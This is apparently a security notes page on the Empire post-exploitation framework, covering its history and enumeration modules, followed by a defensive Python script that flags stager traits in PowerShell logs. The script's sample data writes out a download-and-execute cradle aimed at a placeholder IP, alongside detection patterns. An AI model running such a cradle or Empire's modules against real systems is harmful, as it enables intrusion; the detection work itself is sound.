# Empire and PowerShell

Empire 4.0 is a post-exploitation framework that includes pure-PowerShell Windows agents, Python 3.x Linux/OS X agents, and C# agents. It is the merger of the previous PowerShell Empire and Python EmPyre projects. Empire premiered at BSidesLV in 2015.

BC Security presented updates to further evade the Microsoft Antimalware Scan Interface (AMSI) at DEF CON 27. Empire was originally built by other developers, but once the project went inactive ("It has served its purpose") and was no longer maintained, BC Security forked it and continued its development.

I will demonstrate some situational-awareness techniques with Empire. Empire has the full functionality of PowerView to enumerate a domain and a workstation, as well as other tools for lateral movement, privilege escalation, and persistence.

I will not demonstrate setup, as there are already excellent tutorials and the project's own GitHub repository for that, but Empire essentially needs a listener, a stager, and the agent that calls back to the C2.

The agent will start enumerating the host and the domain.

Host Recon is a good starting point for enumeration.

![](/files/Tbub5AzU8fn6lIPIpZNL)

Seatbelt (the PowerShell version) is integrated with Empire; a few settings are needed to get started, selecting the proper check group or an individual command.

![](/files/ma67cy1tvg35RWbZhp6c)

Domain User Enumeration

![](/files/paTUSUAKu5wOl9RvQwNf)

Privilege Escalation Enumeration

![](/files/Kon2SBGWfbjMIbJvBG2n)

And there are plenty more modules that Empire can execute, around 399 at the time of writing.
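From the defender's side, the listener/stager/agent chain and the PowerView enumeration described above leave traces in PowerShell Script Block Logging (Event ID 4104). The following is an added example, not part of these notes and not Empire's own code: a small Python triage over constructed 4104 script-block text that flags the traits of a stager/agent launch (encoded command, download cradle, hidden window) and of PowerView domain enumeration. The indicator names, regexes, sample blocks and the 192.0.2.10 address are this example's own assumptions.

```python
import base64
import re

# Case-insensitive regexes for traits of a PowerShell stager/agent launch and of
# PowerView-style domain enumeration, as they show up in Script Block Logging
# (Event ID 4104) text. Indicator names and patterns are this example's own choices.
INDICATORS = {
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|Invoke-WebRequest|\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile", re.I),
    "powerview_enum": re.compile(
        r"Get-Domain(?:User|Computer|Group)|Get-NetUser|Find-LocalAdminAccess", re.I),
}

# Constructed sample script blocks (not real captures). The third one carries a
# UTF-16LE/base64 -EncodedCommand payload, the form a stager launch typically uses.
PAYLOAD = "Get-DomainUser | Select-Object samaccountname"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_SCRIPT_BLOCKS = [
    r"Get-ChildItem -Path C:\Windows\Temp -Recurse | Where-Object { $_.Length -gt 1MB }",
    "powershell -NoP -W Hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://192.0.2.10/index.asp')\"",
    f"powershell.exe -NonI -EncodedCommand {ENCODED}",
]


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or '' when absent or not valid base64/UTF-16LE."""
    match = INDICATORS["encoded_command"].search(text)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify_script_block(text):
    """Return the sorted indicator names matched in the block text or in its decoded payload."""
    decoded = decode_encoded_command(text)
    return sorted(name for name, rx in INDICATORS.items()
                  if rx.search(text) or (decoded and rx.search(decoded)))


def triage(blocks):
    """Return (index, indicators) for every block that matched at least one indicator."""
    return [(i, hits) for i, block in enumerate(blocks) if (hits := classify_script_block(block))]
```

Decoding the encoded payload before matching is what catches the enumeration cmdlet in the third block; matching the raw text alone would only see the `-EncodedCommand` flag.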


